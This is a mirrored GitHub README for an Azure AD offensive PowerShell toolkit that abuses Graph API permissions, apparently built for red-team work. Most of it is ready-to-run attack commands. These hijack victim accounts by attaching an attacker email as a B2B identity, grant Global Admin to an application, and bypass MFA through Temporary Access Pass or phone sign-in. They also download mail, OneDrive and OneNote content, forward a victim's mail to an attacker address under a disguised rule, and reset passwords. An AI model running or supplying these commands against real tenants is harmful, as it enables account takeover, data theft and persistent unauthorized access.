Giter Club home page Giter Club logo

abuseazureapipermissions's Introduction

Abuse Azure API Permissions

While reading blog post from Any Robbins and Black Hat USA 2022 talk from Dirk-jan, I found there are lots of fun to play with Azure application.

This script would be good to use when

  • Azure Portal was blocked by organization but still allowing query from Graph API with client app "Microsoft Azure PowerShell" or "Azure Active Directory PowerShell" or etc. It helps you to recon
  • compromised privileged account like Global Admin. It helps you to persist and collect data by different means
  • compromised AAD Sync account [REF] or application owner or application admin or etc. It allow you add credential to service principle and compromise further resources depending on the permission it has
Least Permission Tactic Abuse Abuse Function
Application.Read.All Recon Search for interesting app role assignment such as RoleManagement.ReadWrite.Directory Find-AAAInterestingAppRoleAssignment
RoleManagement.Read.Directory Recon Search for privileged directory role assignment such as Global Admin Find-AAAInterestingDirectoryRoleAssignment
Application.Read.All Recon Obtain details of service principles Get-AAAApplication
User.Read.All Recon Obtain details of Azure users including registered devices, groups Get-AAAUser
GroupMember.Read.All Recon Obtain details of Azure group Get-AAAGroups
Application.ReadWrite.All PE (application), Persistence Add credential to an application New-AAAAppPassword
User.ReadWrite.All [REF-Microsoft permission] PE (non-admin user) Hijack Azure account by editing otherMail of target user to convert into B2B user [REF-BlackHat USA 2022] New-AAAUserOtherMails
User.Invite.All + User.ManageIdentities.All PE (admin user) Hijack Azure account by adding B2B identity of target user New-AAAUserB2BIdentities
RoleManagement.ReadWrite.Directory PE (admin user), Persistence Assign application with privileged directory role [REF-Andy Robbins] Set-AAADirectoryRoleMember
AppRoleAssignment.ReadWrite.All + Application.Read.All PE (admin user) Assign application with privileged app role [REF-Andy Robbins] Set-AAAAppRoleAssignments
Policy.ReadWrite.AuthenticationMethod + Organization.ReadWrite.All PE (admin user), Persistence Configure Certificate-based authentication for organization [REF-Andy Robbins] New-AAAUserAuthCert
Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All PE (admin user), Defence Evasion (bypass MFA), Persistence Configure Temporary Access Pass for a user Set-AAAUserAuthTempPass
Policy.ReadWrite.AuthenticationMethod + UserAuthenticationMethod.ReadWrite.All Defence Evasion (bypass MFA) Configure phone sign-in MFA method for a user Set-AAAUserAuthPhone
Site.Read.All Data Collection Read files in SharePoint Get-AAAOneDriveFile
Files.Read.All Data Collection Read files in OneDrive Get-AAAOneDriveFile
Notes.Read.All Data Collection Read content of OneNote Get-AAAOneNotesContent
Mail.Read Data Collection Read content of emails Get-AAAEmails
MailboxSettings.ReadWrite Data Collection Configure mail forwarding rule of a user New-AAAEmailRules
[REF-Microsoft permission] Persistence Reset password of a user Set-AAAUserPassword

Get Start

Login with Az module

Import-Module .\AbuseAzureAPIPermissions.ps1
Install-Module Az
# login with prompt
Get-AAATokenFromAzLogin
# login as service principal
Get-AAATokenFromAzLogin -User "XXX" -Password "XXX" -TenantId "XXX" -ServicePrincipal
# extract data from token
Get-AAADataFromGraphToken

Login with AADInternals module

AADinternals use client app "Azure Active Directory PowerShell" while this use "Microsoft Azure PowerShell". The reason behind this is "Azure Active Directory PowerShell" may blocked by organization commonly.

Import-Module .\AbuseAzureAPIPermissions.ps1
Import-Module .\AADIntAccessToken\AccessToken.ps1
Import-Module .\AADIntAccessToken\AccessToken_utils.ps1
Import-Module .\AADIntAccessToken\CommonUtils.ps1
# login with prompt
Get-AAATokenFromAADInt
# login with device code flow
Get-AAATokenFromAADInt -UseDeviceCode
# Refersh expired token
Get-AAATokenFromAADInt -Refresh

Recon

App Role assignment

Permission: Application.Read.All, Application.ReadWrite.OwnedBy, Directory.Read.All, Application.ReadWrite.All, Directory.ReadWrite.All

Search for any interesting app role (e.g., File.Read.All) assigned to service principle

Find-AAAInterestingAppRoleAssignment -Application
Find-AAAInterestingAppRoleAssignment -ServicePrinciple
Get-AAAAppRoleAssignments -AppId 'XXXX' -Readable

Directory Role Assignment

Permission: RoleManagement.Read.Directory, Directory.Read.All, RoleManagement.ReadWrite.Directory, Directory.ReadWrite.All

Search for privileged directory role (e.g., Global Admin) assignment

Find-AAAInterestingDirectoryRoleAssignment -ServicePrinciple
Find-AAAInterestingDirectoryRoleAssignment -User
Find-AAAInterestingDirectoryRoleAssignment -Guest
$AppAdminTempateId = "9b895d92-2cd3-44c7-9d02-a6ac2d5ea5c3"
Get-AAADirectoryRoleMember -RoleTemplateId $AppAdminTempateId -filter ServicePrinciple

Application

Permission: Application.Read.All, Application.ReadWrite.OwnedBy, Application.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All

Get the details (e.g., app URL, owner) of service principles

Get-AAAApplication
Get-AAAApplication -ServicePrinciple -AppId 'XXXX'
Get-AAAApplication -Application -Search "citrix"

User

Permission: User.Read.All, User.ReadWrite.All, Directory.Read.All, Directory.ReadWrite.All

Get the details (e.g., registered devices, groups) of user

Get-AAAUser
Get-AAAUser -UserId "[email protected]"
Get-AAAUser -Search "sync" # search for AAD Sync service account
Get-AAAUserDevices -UserId "[email protected]"
Get-AAAUserMemberOf -UserId "[email protected]"
Permission: UserAuthenticationMethod.Read.All, UserAuthenticationMethod.ReadWrite.All

Get authen method of a user

Get-AAAUserAuthMethod -UserId "[email protected]"

Group

Permission: GroupMember.Read.All, Group.Read.All, Directory.Read.All, Group.ReadWrite.All, Directory.ReadWrite.All

Get the details of group

Get-AAAGroups
Get-AAAGroups -Search "helpdesk"
Get-AAAGroupMembers -GroupId "XXX"

Privilege Escalation

Add Credential to Application (PE to application)

Permission: Application.ReadWrite.All

Add password credential for application

New-AAAAppPassword -ServicePrinciple -AppId 'XXXX'
# Clean up
Remove-AAAAppPassword -ServicePrinciple -AppId 'XXXX' -KeyId 'XXXX'

Hijack Azure account - otherMail properties (PE to non-admin user)

Permission: User.ReadWrite.All, Directory.ReadWrite.All (apply to non-admin user)

Permission of privileged directory role: [REF-Microsoft permission]

Hijack normal Azure account (member without mailbox) by editing otherMail of target user to convert into B2B user [REF-BlackHat USA 2022].

# Hijack a member without mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]" 
$DisplayName = "Tommy Cheung"
Set-AAAUserMail -UserId $victim -mail $attackerMail     
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resendInvitation -UserId $victim -mail $attackerMail
Set-AAAUserDisplayname -UserId $victim -DisplayName $DisplayName   
(Get-AAAUser -UserId $victim).identities

# Hijack a guest account
$victim = "XXX"
$attackerMail = "[email protected]" 
Set-AAAUserMail -UserId $victim -mail $attackerMail     
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail

# Hijack a member that had been converted to B2B user already
$victim = "[email protected]"
$attackerMail = "[email protected]" 
Set-AAAUserMail -UserId $victim -mail $attackerMail
Remove-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
New-AAAUserOtherMails -UserId $victim -otherMails $attackerMail
Send-AAAB2BInvitation -action resetRedemption -UserId $victim -mail $attackerMail

# Clean up
Set-AAAUserMail -UserId "[email protected]" -mail "[email protected]"   
Remove-AAAUserOtherMails -UserId "[email protected]" -otherMails "[email protected]"

Hijack Azure account - identities properties (PE to admin user)

Permission for inviting user: User.Invite.All, User.ReadWrite.All, Directory.ReadWrite.All
Permission for adding new identities: User.ManageIdentities.All (apply to all user), Directory.ReadWrite.All (apply to non-admin user)
Permission for cleaning up: User.Read.All + User.ManageIdentities.All (apply to all user), Directory.ReadWrite.All (apply to non-admin user)

Hijack privileged Azure account (member with/without mailbox) by adding B2B identity of target user

# Hijack a member with/without mailbox
$victim = "[email protected]"
$attackerMail = "[email protected]" 
New-AAAUserB2BIdentities -UserId $victim -mail $attackerMail
Send-AAAB2BInvitation -action sendInvitation -mail $attackerMail -Displayname "Tommy Cheung"

# Clean up
Remove-AAAUserB2BIdentities -UserId "[email protected]" -mail "[email protected]"

Assign Directory Role (PE to admin user)

Permission: RoleManagement.ReadWrite.Directory

Assign privileged directory role (e.g., Global Admin) to target object [REF-Andy Robbins]

$TargetObjectId = "XXXX"
$GlobalAdminTempalteId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $TargetObjectId
#Clean up
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $TargetObjectId

Assign App Role (PE to admin user)

Permission: AppRoleAssignment.ReadWrite.All and Application.Read.All, AppRoleAssignment.ReadWrite.All and Directory.Read.All

Assign privileged application role (e.g., RoleManagement.ReadWrite.Directory) to target service principle [REF-Andy Robbins]

# Assign "Sites.ReadWrite.All" to specific application to access all SharePoint Sites and OneDrive
Set-AAAAppRoleAssignments -AppId 'XXXX' -AppRoleId "9492366f-7969-46a4-8d15-ed1a20078fff"

# Assign "RoleManagement.ReadWrite.Directory" to specific application and assign Global Admin role to itself
$CurrentAppId = "XXXX"
$CurrentObjectId = (Get-AAAApplication -ServicePrinciple -AppId $CurrentAppId).id
$GlobalAdminTempalteId = "62e90394-69f5-4237-9190-012177145e10"
Set-AAAAppRoleAssignments -AppId $CurrentAppId -AppRoleId "9e3f62cf-ca93-4989-b6ce-bf83c28f9fe8"
Set-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $CurrentObjectId

# Clean up
Remove-AAAAppRoleAssignments -AppId "XXXX" -AssignId "XXXX"
Remove-AAADirectoryRoleMember -RoleTemplateId $GlobalAdminTempalteId -TargetObjectId $CurrentObjectId

Configure Certificate-based authentication (PE to admin user)

Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring cert-based authen: Organization.ReadWrite.All

Configure Certificate-based authentication for organization [REF-Andy Robbins]

# Enable cert-based authen method for organization
Set-AAAAutenMethod -CertAuth

# Generate and upload cert file
linux# ./AAAUserAuthCert.sh -g crt  
New-AAAUserAuthCert -CertFile ".\ca.crt"

# Generate pfx file to login as [email protected]. Can install the pfx file locally for authen
linux# ./AAAUserAuthCert.sh -g pfx -u [email protected] -s "/C=AU/ST=XX/L=XX/O=XXX/OU=IT/[email protected]"

# Clean up
Set-AAAAutenMethod -CertAuth -Disable
Remove-AAAUserAuthCert -issuerSki "XXXX"

Configure Temporary Access Pass (PE to admin user, bypass MFA)

Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring temp access pass authen: UserAuthenticationMethod.ReadWrite.All

Configure Temporary Access Pass for a user

Set-AAAAutenMethod -TempPass
Set-AAAUserAuthTempPass -UserId "[email protected]"
# Clean up
Remove-AAAUserAuthTempPass -UserId "[email protected]" -TempPassId "XXXX"
Set-AAAAutenPolicy -TempPass -Disable

Defence Evasion

Configure phone sign-in MFA (bypass MFA)

Permission for configuring authen method: Policy.ReadWrite.AuthenticationMethod
Permission for configuring phone sign-in authen: UserAuthenticationMethod.ReadWrite.All

Configure phone sign-in MFA method for a user

Set-AAAAutenMethod -sms
Set-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
# Clean up
Remove-AAAUserAuthPhone -UserId "[email protected]" -phoneNumber "+852XXXXXXX"
Set-AAAAutenPolicy -sms -Disable

Data Collection

SharePoint

Permission: Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All

List details and download item from a SharePoint site

Get-AAASite
Get-AAAOneDriveFolder -SitetId "XXXX"
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -showDetails
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -recurse | Export-CSV -Encoding UFT8 Result.csv
Get-AAAOneDriveFolder -SitetId "XXXX" -FolderId "XXXX" -Parent
Get-AAAOneDriveFolder -SitetId "XXXX" -FileId "XXXX" -Download

OneDrive

Permission: Files.Read.All, Files.ReadWrite.All, Sites.Read.All, Sites.ReadWrite.All, Sites.Manage.All, Sites.FullControl.All

List details of and download item from a OneDrive of a user

Get-AAAOneDriveFolder -UserId "[email protected]"
Get-AAAOneDriveFolder -UserId "[email protected]" -FolderId "XXXX"
Get-AAAOneDriveFolder -UserId "[email protected]" -FileId "XXXX" -Download

OneNote

Permission: Notes.Read.All, Notes.ReadWrite.All

List details of and download One Note items of a user

Get-AAAOneNotes -UserId "[email protected]"
Get-AAAOneNotesContent -UserId "[email protected]" -PageId "XXXX" -OutHTMLFile output.html

Email

Permission: Mail.Read, Mail.ReadWrite

Read emails and download attachments from a mailbox

Get-AAAEmails -UserId "[email protected]"
Get-AAAEmails -UserId "[email protected]" -Search "password" -Top 7
Get-AAAEmails -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX"
Get-AAAEmailAttachments -UserId "[email protected]" -MessageId "XXXX" -AttachmentId "XXXX"

Create Mail Rule

Permission: MailboxSettings.ReadWrite

Create a highest order mail rule to forward all email of a mailbox. Be cautious of detection and alert of mail rule creation for forwarding email to external mailbox.

$victim = "[email protected]"
$attackerMail = "[email protected]" 
Get-AAAEmailRules -UserId $victim
New-AAAEmailRules -UserId $victim -MailRuleDisplayName "Reporting Rule" -EmailDisplayName "Tommy Cheung (IT)" -Email $attackerMail
# Clean up
Remove-AAAEmailRules -UserId $victim -MailRuleId "XXXX"

Persistence

Reset password

Permission of privileged directory role: [REF-Microsoft permission]

Change password of users

Set-AAAUserPassword -UserId "[email protected]" -password "P@ssw0rd@1112233"

References

abuseazureapipermissions's People

Contributors

hagrid29 avatar

Recommend Projects

  • React photo React

    A declarative, efficient, and flexible JavaScript library for building user interfaces.

  • Vue.js photo Vue.js

    ๐Ÿ–– Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.

  • Typescript photo Typescript

    TypeScript is a superset of JavaScript that compiles to clean JavaScript output.

  • TensorFlow photo TensorFlow

    An Open Source Machine Learning Framework for Everyone

  • Django photo Django

    The Web framework for perfectionists with deadlines.

  • D3 photo D3

    Bring data to life with SVG, Canvas and HTML. ๐Ÿ“Š๐Ÿ“ˆ๐ŸŽ‰

Recommend Topics

  • javascript

    JavaScript (JS) is a lightweight interpreted programming language with first-class functions.

  • web

    Some thing interesting about web. New door for the world.

  • server

    A server is a program made to process requests and deliver data to clients.

  • Machine learning

    Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.

  • Game

    Some thing interesting about game, make everyone happy.

Recommend Org

  • Facebook photo Facebook

    We are working to build community through open source technology. NB: members must have two-factor auth.

  • Microsoft photo Microsoft

    Open source projects and samples from Microsoft.

  • Google photo Google

    Google โค๏ธ Open Source for everyone.

  • D3 photo D3

    Data-Driven Documents codes.